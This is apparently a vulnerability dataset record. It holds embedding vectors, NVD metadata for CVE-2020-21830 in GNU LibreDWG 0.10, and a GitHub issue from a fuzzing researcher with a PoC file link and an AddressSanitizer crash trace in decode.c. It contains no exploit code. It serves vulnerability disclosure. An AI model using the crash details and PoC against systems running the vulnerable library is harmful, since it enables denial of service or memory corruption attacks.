-0.013862263411283493, 0.009451542980968952, 0.009541558101773262, -0.03117509000003338, -0.0050108181312680244, 0.0031242601107805967, 0.025849221274256706, 0.020133286714553833, -0.008543894626200199, 0.02803957834839821, 0.0009910992812365294, 0.00960156787186861, -0.007384955883026123, 0.009999132715165615, -0.0014505493454635143, -0.004688265733420849, -0.011086810380220413, 0.01068174373358488, -0.008296354673802853, 0.01113181747496128, 0.03669599071145058, -0.004868295043706894, -0.029809867963194847, 0.0165777076035738, 0.0017468477599322796, 0.0222336295992136, -0.002737947041168809, -0.003129885997623205, -0.00508958101272583, -0.030514981597661972, -0.01621764712035656, -0.013502204790711403, -0.000028759579436155036, 0.007587488740682602, -0.013299671933054924, -0.01268457155674696, 0.00544963963329792, 0.03858629986643791, -0.0046357568353414536, 0.001501182559877634, 0.006364789325743914, 0.005104583688080311, -0.01614263653755188, 0.0027792036999017, 0.027259450405836105, 0.009661577641963959, -0.004256945103406906, 0.014604885131120682, 0.01187443919479847, 0.012226996012032032, 0.01650269515812397, 0.010944287292659283, 0.0013802254106849432, -0.004238191992044449, 0.006154755130410194, 0.011274340562522411, 0.01974322460591793, 0.012347016483545303, 0.010419201105833054, 0.015272493474185467, -0.004043160006403923, -0.010066643357276917, 0.0061622560024261475, -0.006364789325743914, -0.004121922887861729, 0.009766594506800175, -0.01639767736196518, -0.0008101323037408292, 0.0017355958698317409, 0.027559500187635422, 0.0165777076035738, -0.048697952181100845, -0.0043169548735022545, -0.007617493625730276, -0.010374194011092186, -0.006544818636029959, 0.009038975462317467, -0.012587055563926697, -0.009579064324498177, 0.014612386003136635, 0.00980410072952509, -0.0018743685213848948, 0.002394766081124544, 0.018032943829894066, 0.019878245890140533, 0.007823777385056019, -0.020193297415971756, -0.015752572566270828, 0.01016415935009718, -0.0016605836572125554, -0.013014624826610088, -0.026539333164691925, -0.002865467919036746, -0.012782086618244648, 0.006942383479326963, -0.01493493840098381, 0.00203095655888319, 0.009219005703926086, -0.012302008457481861, 0.024198951199650764, 0.007234931457787752, 0.0022447414230555296, -0.002449149964377284, 0.01282709464430809, -0.01120682992041111, -0.011649401858448982, -0.0054683927446603775, -0.0077112591825425625, 0.003598712617531419, -0.00589221203699708, -0.027379469946026802, -0.006556070409715176, 0.021123448386788368, 0.024694032967090607, 0.011634400114417076, 0.01426732912659645, -0.005464642308652401, 0.0022916242014616728, 0.005250857211649418, 0.029389798641204834, -0.02907474711537361, -0.0004449163971003145, -0.009038975462317467, 0.0019090616842731833, -0.005348373204469681, 0.02241365984082222, -0.006312280893325806, -0.016712728887796402, 0.01293961238116026, 0.012947114184498787, 0.02821960859000683, -0.011529382318258286, -0.004256945103406906, 0.008753929287195206, -0.015467525459825993, -0.009931622073054314, -0.009684081189334393, 0.01215948536992073, 0.021573523059487343, 0.006852368824183941, 0.010336687788367271, 0.0021734798792749643, 0.011094311252236366, 0.0201782938092947, 0.012489539571106434, -0.012414527125656605, 0.01376474741846323, 0.011146820150315762, -0.007006144151091576, -0.02316378243267536, -0.0169677697122097, -0.0034449375234544277, 0.016667721793055534, -0.0007257434772327542, -0.009901616722345352, -0.002379763638600707, 0.019698215648531914, 0.015452522784471512, -0.025174111127853394, -0.004088167566806078, 0.014094801619648933, 0.0066010779701173306, 0.006638583727180958, -0.0016080751083791256, 0.008903954178094864, -0.0025429152883589268, -0.0013286544708535075, -0.004005654249340296, 0.018182968720793724, 0.024559009820222855, -0.017642879858613014, -0.01639767736196518, 0.0292997844517231, -0.002533538732677698, 0.010381694883108139, 0.0045494926162064075, 0.005880960263311863, -0.006263522896915674, 0.02539914660155773, -0.022218627855181694, 0.011829431168735027, -0.02053835429251194, 0.011319348588585854, -0.00014428136637434363, 0.008401371538639069, -0.008731425739824772, -0.008993968367576599, -0.02392890676856041, 0.012414527125656605, 0.004241942428052425, -0.012309510260820389, -0.002044083783403039, -0.0025279128458350897, -0.0038856344763189554, -0.020598363131284714, 0.027439480647444725, 0.00391939003020525, 0.015902597457170486, 0.023823890835046768, -0.035615816712379456, 0.005817200057208538, -0.003069876227527857, 0.010291680693626404, 0.008153831586241722, 0.011731915175914764, 0.004740774165838957, -0.007557483855634928, 0.027649514377117157, 0.020988427102565765, -0.004406969528645277, -0.002640431048348546, 0.0032442796509712934, 0.0018603038042783737, -0.01899310201406479, 0.005400881636887789, 0.006173508241772652, 0.0026235533878207207, 0.02485905960202217, 0.005633419845253229, 0.009264012798666954, 0.005955972708761692, -0.015182479284703732, -0.0035818349570035934, 0.01203196495771408, 0.017702890560030937, 0.014672395773231983, -0.007928794249892235, -0.03303539380431175, -0.005479644518345594, 0.01061423309147358, 0.01953318901360035, 0.004590749740600586, 0.015437521040439606, -0.013704737648367882, -0.028309622779488564, -0.008423875086009502, -0.017102792859077454, -0.011619397439062595, -0.0002653558331076056, -0.006904877256602049, -0.011326849460601807, 0.01026917714625597, -0.0039043875876814127, 0.011274340562522411, -0.009113987907767296, -0.003908138256520033, 0.025744203478097916, 0.019623203203082085, -0.024198951199650764, -0.00935402698814869, 0.029629837721586227, 0.017417844384908676, 0.006912378594279289, -0.020568357780575752, 0.031475137919187546, 0.0010323560563847423, -0.01873805932700634, 0.010119152255356312, -0.020268309861421585, 0.012962116859853268, -0.005895962473005056, 0.004695766605436802, 0.005040823016315699, -0.0036474706139415503, -0.0008926457376219332, -0.012857099063694477, 0.0010942411608994007, -0.005550906527787447, 0.009046477265655994, -0.0004894548910669982, -0.005438387859612703, 0.03369550034403801, -0.006184760015457869, 0.01714779995381832, 0.004590749740600586, 0.006113498006016016, -0.0011364355450496078, 0.009106487035751343, 0.009219005703926086, 0.015189980156719685, -0.0032574068754911423, -0.0010379819432273507, 0.018438011407852173, 0.009031474590301514, 0.008738926611840725, 0.004827038384974003, 0.009286516346037388, 0.015032454393804073, 0.010764257982373238, 0.011619397439062595, 0.0061622560024261475, -0.01585758849978447, -0.005854705814272165, 0.0015143097843974829, -0.0178679171949625, -0.0136222243309021, -0.014552376233041286, 0.0022316144313663244, -0.0020384578965604305, -0.01419981848448515, -0.0025822967290878296, 0.016172640025615692, 0.01801794208586216, -0.02323879487812519, -0.010689245536923409, 0.01822797581553459, -0.014207319356501102, -0.0036906024906784296, -0.0035949619486927986, 0.005880960263311863, 0.02002827078104019, 0.0029948640149086714, -0.0063760410994291306, -0.0032630327623337507, -0.006934882141649723, -0.011769421398639679, 0.008191337808966637, -0.021723547950387, -0.004185683559626341, 0.005134588573127985, 0.009256510995328426, -0.0015246239490807056, 0.013337178155779839, -0.009068980813026428, 0.0030830034520477057, 0.014222322031855583, -0.00508207967504859, -0.006987391039729118, -0.009969127364456654, 0.008611406199634075, -0.01209197472780943, -0.014117305167019367, 0.004380715079605579, 0.034145575016736984, -0.012482037767767906, 0.0021753550972789526, 0.012309510260820389, 0.009541558101773262, 0.000917024735826999, -0.016442684456706047, -0.0018284235848113894, 0.006683591287583113, 0.004391967318952084, 0.008266349323093891, 0.003795619821175933, -0.018648045137524605, -0.012226996012032032, 0.004350710194557905, 0.009999132715165615, 0.0012855223612859845, 0.004118172451853752, -0.023073768243193626, -0.0009845357853919268, 0.00486454414203763, 0.019143125042319298, 0.00289547280408442, 0.014394850470125675, -0.021708544343709946, -0.0020347072277218103, 0.01668272353708744, -0.005847204942256212, 0.009271513670682907, -0.008228844031691551, 0.00364371994510293, -0.017987936735153198, -0.029209770262241364, 0.003043622011318803, -0.016412679105997086, 0.007883787155151367, 0.00439571775496006, -0.00046648242278024554, -0.0021453502122312784, 0.017627878114581108, -0.001488993177190423, 0.018858078867197037, -0.014004786498844624, -0.01840800605714321, 0.003446812741458416, -0.006094745360314846, 0.0008677979349158704, -0.0019840740133076906, 0.004830788820981979, -0.009616570547223091, -0.0018949969671666622, -0.006316031329333782, 0.015437521040439606, -0.0018453012453392148, -0.009121489711105824, 0.011296844109892845, 0.014972444623708725, 0.02868468314409256, 0.0038443778175860643, -0.014109804295003414, -0.0061097475700080395, 0.007448716089129448, -0.009811601601541042, -0.013269666582345963, 0.0014242950128391385, 0.00016233119822572917, 0.007718760520219803, -0.005730935838073492, -0.0012255125911906362, -0.006492310203611851, -0.00577594293281436, -0.002826086478307843, 0.01996826007962227, 0.02035832405090332, -0.00011451088357716799, 0.018257981166243553, 0.007778770290315151, -0.005847204942256212, -0.008843944407999516, -0.015677560120821, 0.009436541236937046, 0.017447849735617638, 0.018603038042783737, 0.00981910340487957, 0.0009929746156558394, 0.04002653434872627, 0.026074256747961044, 0.003934392239898443, 0.004219438880681992, 0.03654596582055092, 0.02868468314409256, 0.002012203447520733, 0.014747408218681812, 0.011859436519443989, -0.012699573300778866, 0.007557483855634928, 0.017252817749977112, 0.005753439385443926, 0.010434203781187534, 0.011694409884512424, -0.011184326373040676, 0.0027435729280114174, 0.017207808792591095, -0.017267819494009018, -0.014327339828014374, 0.00543088698759675, -0.003572458401322365, 0.01783791184425354, -0.0014964943984523416, 0.0012151984265074134, -0.007561234757304192, 0.007891288958489895, 0.02619427628815174, -0.009143993258476257, -0.02205360122025013, 0.002533538732677698, 0.017342831939458847, 0.030034903436899185, -0.031145084649324417, 0.018393002450466156, 0.009909117594361305, -0.007516227196902037, -0.0046470086090266705, 0.0038556295912712812, -0.006679840851575136, -0.004684514831751585, -0.014889931306242943, 0.005895962473005056, -0.0073999580927193165, -0.0036662237253040075, -0.011094311252236366, -0.002347883302718401, -0.000013537366612581536, -0.012422027997672558, 0.0022297389805316925, 0.011679407209157944, -0.0016343293245881796, 0.008063816465437412, -0.027439480647444725, -0.006184760015457869, -0.02305876463651657, 0.016622714698314667, -0.0115668885409832, 0.01827298291027546, -0.01768788881599903, 0.004602001514285803, -0.005858456715941429, -0.0022278637625277042, -0.022923743352293968, 0.010839269496500492, -0.011836932972073555, 0.0022616193164139986, -0.04302702471613884, 0.009143993258476257, 0.0219785887748003, -0.0031505143269896507, 0.011146820150315762, -0.012947114184498787, -0.012549549341201782, -0.001097054104320705, -0.00886644795536995, 0.009624071419239044, 0.0038124974817037582, 0.0014008537400513887, -0.016367672011256218, -0.0008326359675265849, -0.01178442407399416, -0.00138960184995085, -0.01419981848448515, 0.0051495907828211784, -0.004121922887861729, -0.009196501225233078, 0.015189980156719685, 0.006657336838543415, -0.0011523757129907608, 0.008873948827385902, 0.025564173236489296, -0.010081646032631397, -0.0019353160168975592, -0.005194598343223333, -0.005933468695729971, -0.0058322022669017315, -0.01062923576682806, -0.0033061648719012737, -0.0016080751083791256, -0.010554223321378231, 0.009661577641963959, 0.008633909747004509, -0.006541068200021982, -0.007553733419626951, 0.01399728562682867, 0.019083116203546524, 0.005067077465355396, -0.011746917851269245, 0.009331523440778255, -0.007748765405267477, 0.020043272525072098, -0.0021059687715023756, -0.006064740475267172, -0.0045494926162064075, -0.025054091587662697, 0.018948093056678772, -0.0022728710900992155, 0.0010304807219654322, -0.013824757188558578, -0.015842586755752563, 0.012422027997672558, 0.012527045793831348, -0.02572920173406601, 0.016307663172483444, 0.027124429121613503, -0.010404198430478573, 0.014852425083518028, -0.008543894626200199, 0.016487691551446915, -0.01113181747496128, -0.0008490448817610741, 0.008183836005628109, -0.0016943392110988498, -0.0022447414230555296, 0.0023928906302899122, 0.009759093634784222, -0.013029627501964569, -0.0349557064473629, -0.024694032967090607, 0.010479210875928402, 0.0007745014736428857, -0.005367126315832138, -0.01740284077823162, -0.018783066421747208, 0.003101756563410163, -0.017672885209321976, -0.014147309586405754, -0.008453880436718464, -0.003212399547919631, -0.029854875057935715, 0.005914715584367514, -0.00821384135633707, -0.004226940218359232, 0.006961136590689421, 0.02601424790918827, -0.024844055995345116, -0.010816765949130058, 0.001905311131849885, -0.011836932972073555, -0.006642334628850222, 0.05232854560017586, 0.01309713814407587, 0.009594066068530083, 0.013847260735929012, -0.010464208200573921, -0.0031673922203481197, 0.00020968267926946282, -0.016487691551446915, -0.007306193001568317, -0.005940970033407211, -0.022608691826462746, -0.0011917570373043418, 0.00855889730155468, -0.0014383598463609815, -0.005067077465355396, -0.0060234833508729935, -0.011454369872808456, -0.0018828074680641294, -0.017972934991121292, -0.017462851479649544, 0.019473180174827576, -0.003255531657487154, 0.02904474176466465, -0.018287986516952515, -0.009541558101773262, -0.0035218249540776014, 0.008468883112072945, -0.011199329048395157, -0.0049245539121329784, -0.00566717516630888, 0.0006272899336181581, -0.015812581405043602, -0.010801763273775578, -0.008858946152031422, 0.00843137688934803, -0.001279896474443376, 0.010314184240996838, 0.018137961626052856, -0.02439398318529129, -0.01642768271267414, -0.01578257791697979, 0.005817200057208538, 0.00037763977888971567, -0.011394360102713108, -0.019953258335590363, 0.026899391785264015, -0.03321542218327522, 0.029929887503385544, 0.03177518770098686, 0.03318541869521141, 0.011169323697686195, -0.005074578803032637, -0.0007107410347089171, 0.011731915175914764, -0.0035237004049122334, -0.011454369872808456, 0.012264502234756947, -0.019443174824118614, -0.02374887838959694, -0.01837800070643425, 0.007448716089129448, -0.015647554770112038, -0.007632496301084757, -0.010674242861568928, -0.0199232529848814, -0.006075992248952389, 0.019728220999240875, 0.009466545656323433, 0.002325379755347967, 0.020523350685834885, -0.01309713814407587, -0.009751591831445694, -0.007482471875846386, -0.018513021990656853, 0.004080666229128838, -0.03312540799379349, -0.006346036214381456, -0.0201782938092947, 0.0027735778130590916, -0.008656413294374943, -0.02046334184706211, -0.0018809321336448193, -0.0015911973314359784, -0.009991631843149662, 0.011836932972073555, 0.00046273181214928627, 0.011161822825670242, -0.02475404180586338, 0.001905311131849885, -0.00589971337467432, 0.030604997649788857, 0.0027210693806409836, -0.003990651573985815, -0.023073768243193626, 0.009053978137671947, 0.012849598191678524, 0.0012367644812911749, 0.014904933981597424, -0.003056749003008008, 0.004609502851963043, 0.010966790840029716, 0.00810882356017828, -0.03762614354491234, -0.00958656519651413, 0.000987348728813231, -0.013322175480425358, 0.01848301850259304, -0.02136348746716976, -0.0069761392660439014, 0.004095668904483318, 0.01524248905479908, -0.003338044974952936, -0.021858569234609604, 0.007542481645941734, -0.0027304459363222122, 0.00544963963329792, 0.023223791271448135, 0.0032986635342240334, -0.00025340073625557125, 0.02136348746716976, -0.0009306207066401839, 0.004226940218359232, 0.012587055563926697, -0.011536884121596813, -0.013029627501964569, 0.007317444775253534, 0.0005133650847710669, 0.024739040061831474, 0.012429529801011086, -0.008693919517099857, 0.012264502234756947, 0.008806438185274601, 0.026074256747961044, 0.009706584736704826, 0.02508409507572651, -0.008356364443898201, -0.02619427628815174, 0.0190231055021286, 0.004797033034265041, 0.008033812046051025, 0.007002393249422312, 0.03966647759079933, 0.002460401738062501, -0.009001470170915127, -0.01834799535572529, 0.0022541179787367582, -0.006683591287583113, -0.01783791184425354, -0.006466055754572153, 0.001265831640921533, 0.0072949412278831005, 0.0033980547450482845, -0.007639997638761997, -0.013682234100997448, 0.013164649717509747, 0.01711779460310936, 0.013847260735929012, 0.024889063090085983, -0.024964075535535812, 0.011484375223517418, -0.012527045793831348, 0.029059745371341705, 0.004988314583897591, -0.03447562828660011, 0.006379791535437107, -0.004710769280791283, 0.02328380197286606, -0.01845301315188408, 0.012887104414403439, -0.009751591831445694, -0.03978649526834488, -0.00542338564991951, 0.006728598847985268, -0.009571562521159649, 0.01466489490121603, 0.003641844727098942, 0.01599261164665222, 0.009661577641963959, 0.012654566206037998, 0.009969127364456654, 0.006784857716411352, 0.02349383570253849, -0.021423498168587685, 0.003878133138641715, 0.02266870066523552, -0.0023553846403956413, 0.000973283895291388, -0.015542537905275822, 0.0072086770087480545, 0.0021603526547551155, 0.013014624826610088, -0.011904443614184856, 0.012984620407223701, 0.00033028831239789724, -0.008363865315914154, 0.023073768243193626, 0.010749255307018757, 0.003173018107190728, 0.02089841291308403, -0.011979456059634686, 0.019338157027959824, -0.02061336487531662, 0.009046477265655994, -0.0034111819695681334 ]
2,301
CVE-2020-21830
2021-05-17T21:15:07.297000
A heap based buffer overflow vulneraibility exists in GNU LibreDWG 0.10 via bit_calc_CRC ../../src/bits.c:2213.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Not Applicable" ], "url": "http://gnu.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493134" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10:*:*:*:*:*:*:*", "matchCriteriaId": "C3E7D34E-1D80-4CF0-8110-412C6D8514EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493134
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/188/comments
15
2020-01-15T04:37:59
2020-01-16T23:22:04Z
https://github.com/LibreDWG/libredwg/issues/188
549,961,224
188
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ``` --- end body ---
1,738
[ -0.01771734096109867, 0.02177508734166622, -0.004499936942011118, 0.01551753655076027, 0.05074412748217583, 0.05451946705579758, -0.01743493415415287, 0.04515543952584267, -0.01896587759256363, 0.028121819719672203, -0.012106354348361492, 0.0009717040229588747, 0.011898264288902283, 0.012180672027170658, -0.010813225992023945, 0.014610860496759415, -0.002991287736222148, 0.00820467434823513, -0.023008761927485466, -0.027334051206707954, 0.028448818251490593, -0.005874814465641975, -0.017747068777680397, 0.021284591406583786, -0.025386927649378777, 0.004366165027022362, -0.005781917367130518, -0.007773632183670998, -0.017821386456489563, 0.01728629879653454, 0.014142659492790699, 0.022027768194675446, 0.017999747768044472, 0.0009350096224807203, 0.037545304745435715, -0.010523387230932713, 0.04408526420593262, 0.06064324826002121, 0.013377186842262745, 0.03430505096912384, 0.005477214697748423, -0.07390152662992477, -0.021329181268811226, 0.014432498253881931, -0.011801651678979397, -0.008635717444121838, 0.02861231565475464, 0.016840392723679543, -0.013176528736948967, -0.001958271488547325, -0.011578698642551899, -0.0173011627048254, -0.035494137555360794, -0.07384207099676132, 0.04331235960125923, -0.0175241157412529, 0.03323487937450409, 0.022830398753285408, 0.00505731999874115, -0.006027165800333023, -0.018386200070381165, 0.030737802386283875, -0.0034409097861498594, 0.027675913646817207, 0.006844660732895136, 0.020987320691347122, -0.03995319828391075, 0.007494940422475338, -0.02764618583023548, -0.0052208187989890575, 0.0034724948927760124, -0.044441986829042435, -0.005243114195764065, 0.027393506839871407, 0.02162645198404789, -0.006636571139097214, 0.011771924793720245, 0.01183881051838398, -0.01660257577896118, 0.022993898019194603, -0.013013030402362347, 0.042301636189222336, -0.035077955573797226, 0.0175241157412529, 0.008004017174243927, 0.005867382977157831, -0.022339902818202972, -0.08353310078382492, -0.006235255394130945, -0.045749980956315994, -0.00469687907025218, 0.030826983973383904, 0.02452484332025051, -0.00876205787062645, 0.017420070245862007, -0.011036179028451443, -0.04007210582494736, -0.017271434888243675, -0.04860378056764603, -0.011169951409101486, -0.03873438760638237, -0.005733611062169075, -0.011905696243047714, 0.011184814386069775, 0.03219442814588547, 0.018624017015099525, 0.0030414520297199488, -0.015874261036515236, 0.0061572217382490635, 0.11367636173963547, 0.0015123652992770076, -0.008383037522435188, -0.038526300340890884, -0.005986290983855724, -0.007052750326693058, 0.008866102434694767, 0.037783119827508926, -0.007714177947491407, -0.057402994483709335, -0.024822114035487175, 0.0012652588775381446, -0.031956613063812256, -0.028463680297136307, 0.004983002319931984, -0.04797951132059097, 0.03644540160894394, 0.006242687348276377, -0.01756870560348034, -0.023187123239040375, -0.01333259604871273, -0.024822114035487175, -0.037218306213617325, 0.0180889293551445, -0.021046774461865425, 0.01034502498805523, 0.0048157875426113605, -0.030232442542910576, 0.030975619331002235, 0.01706334576010704, 0.006287277676165104, -0.05663008987903595, -0.04105310142040253, 0.033769965171813965, -0.010619999840855598, -0.029073085635900497, 0.00006856969412183389, -0.04200436547398567, 0.011288859881460667, 0.0023725926876068115, -0.010828089900314808, -0.017657887190580368, -0.02456943318247795, 0.010151798836886883, 0.03145125135779381, 0.042598906904459, -0.019560420885682106, 0.020199552178382874, 0.0458688884973526, 0.008472218178212643, -0.026115242391824722, 0.018728062510490417, -0.030499985441565514, 0.025892289355397224, -0.036148130893707275, -0.025788243860006332, -0.000012170975423941854, 0.01794029399752617, 0.022250721231102943, -0.006216675974428654, 0.025386927649378777, 0.0011519244872033596, -0.016572847962379456, 0.027140825986862183, 0.017925430089235306, -0.059216346591711044, 0.002393030095845461, -0.01181651558727026, 0.020303597673773766, -0.014692610129714012, -0.012901553884148598, 0.0037251750472933054, 0.007546963170170784, 0.019278012216091156, -0.0007524667889811099, 0.017137663438916206, 0.003946270328015089, 0.03145125135779381, -0.005659293383359909, -0.0066774459555745125, -0.03472123295068741, 0.00420638220384717, -0.009334303438663483, 0.004210098180919886, -0.022770944982767105, 0.04108282923698425, -0.019367193803191185, -0.040250468999147415, -0.016067488119006157, 0.009891686961054802, -0.01158613059669733, 0.007803359068930149, 0.011051042936742306, -0.02018468827009201, 0.014700042083859444, -0.006042029242962599, 0.00136001396458596, -0.014930427074432373, 0.046820152550935745, -0.0011881543323397636, -0.031956613063812256, -0.0129610076546669, -0.034186143428087234, 0.01724170707166195, -0.005250545684248209, -0.025832833722233772, 0.003167792223393917, -0.015324310399591923, 0.028969042003154755, -0.034929320216178894, 0.0010933992452919483, 0.02773536741733551, -0.02125486359000206, 0.007480076979845762, 0.0027274598833173513, -0.07818222790956497, -0.010672022588551044, 0.00843505933880806, 0.009958572685718536, -0.04512571170926094, 0.004054030869156122, 0.03626703843474388, -0.030083807185292244, -0.007951994426548481, 0.018148383125662804, -0.026174696162343025, -0.010307866148650646, -0.002071605995297432, 0.013785934075713158, -0.030262170359492302, 0.01728629879653454, 0.022354764863848686, 0.02470320463180542, -0.017033617943525314, -0.01822270080447197, 0.011088201776146889, 0.04652288183569908, -0.01002545841038227, -0.004262120462954044, -0.028864996507763863, 0.027988048270344734, 0.009802505373954773, -0.03052971325814724, 0.008130356669425964, 0.022681763395667076, 0.01379336602985859, -0.010389614850282669, 0.028077229857444763, 0.018624017015099525, -0.01438047643750906, -0.0373074896633625, 0.03772366791963577, 0.0010051470017060637, -0.011853674426674843, -0.0011277712183073163, 0.00734258908778429, -0.015903988853096962, -0.030410805717110634, 0.021180545911192894, -0.018579427152872086, -0.028924450278282166, 0.04693906381726265, -0.014484521001577377, -0.0022648321464657784, -0.006956137251108885, -0.024405933916568756, 0.007758768275380135, 0.04075583070516586, 0.002669863635674119, -0.004652288276702166, 0.00139252794906497, -0.0019285444868728518, 0.02754214219748974, -0.018936151638627052, 0.01072404533624649, -0.009445779956877232, -0.018861833959817886, -0.009854528121650219, -0.028552861884236336, -0.03219442814588547, -0.010032890364527702, -0.00046076977741904557, 0.008494514040648937, -0.05377629026770592, -0.0034056089352816343, -0.01319139264523983, 0.03923974931240082, 0.013377186842262745, -0.012849531136453152, -0.05603554844856262, -0.00078498077346012, -0.02199804037809372, -0.01218810398131609, -0.02162645198404789, -0.01902533322572708, -0.020496822893619537, -0.0026104093994945288, -0.0175241157412529, 0.019753646105527878, -0.0175241157412529, -0.007301714736968279, 0.02037791535258293, -0.04824705421924591, -0.00902216974645853, -0.02992030791938305, -0.02601119689643383, -0.007413191255182028, 0.015086494386196136, -0.046730972826480865, -0.010612567886710167, 0.0028723792638629675, -0.04375826567411423, -0.004663436207920313, -0.03332405909895897, 0.006941273808479309, 0.03998292610049248, -0.03864520788192749, 0.006302141584455967, 0.049763135612010956, -0.05425192415714264, 0.023424940183758736, 0.015041903592646122, -0.01794029399752617, -0.00456682313233614, -0.015681035816669464, -0.003812498180195689, -0.04866323247551918, -0.05080358311533928, 0.02358843944966793, 0.01673634722828865, -0.0035876871552318335, -0.012195535004138947, 0.02581797167658806, 0.002136633964255452, -0.005815360229462385, 0.007431770674884319, -0.02895417809486389, 0.009631575085222721, -0.02088327519595623, 0.01939692161977291, -0.010151798836886883, 0.0010218684328719974, 0.04973340779542923, -0.020125234499573708, 0.037545304745435715, -0.0008439704542979598, -0.028136683627963066, 0.003102764254435897, -0.046582337468862534, 0.012225262820720673, -0.0031789399217814207, 0.0026494262274354696, -0.013161665759980679, 0.00011902445112355053, 0.002824072726070881, 0.011437495239078999, 0.012225262820720673, 0.008814079686999321, 0.005733611062169075, -0.0036174142733216286, -0.0011723617790266871, -0.03454286977648735, 0.05541128292679787, -0.03808039054274559, -0.029191995039582253, -0.018713198602199554, -0.02679896540939808, 0.02572879008948803, 0.023469531908631325, -0.03359160199761391, 0.004511084873229265, -0.041796278208494186, -0.010032890364527702, -0.002928117522969842, -0.03644540160894394, 0.029890581965446472, 0.034096963703632355, -0.022354764863848686, 0.03882357105612755, -0.02306821569800377, -0.029102813452482224, -0.008457355201244354, 0.0648050382733345, -0.007115920074284077, -0.045928340405225754, 0.011244269087910652, 0.04129091650247574, -0.009958572685718536, -0.004971854388713837, 0.009029600769281387, -0.03436450660228729, -0.01961987465620041, 0.012106354348361492, -0.014365612529218197, -0.00962414313107729, 0.020392779260873795, 0.035077955573797226, 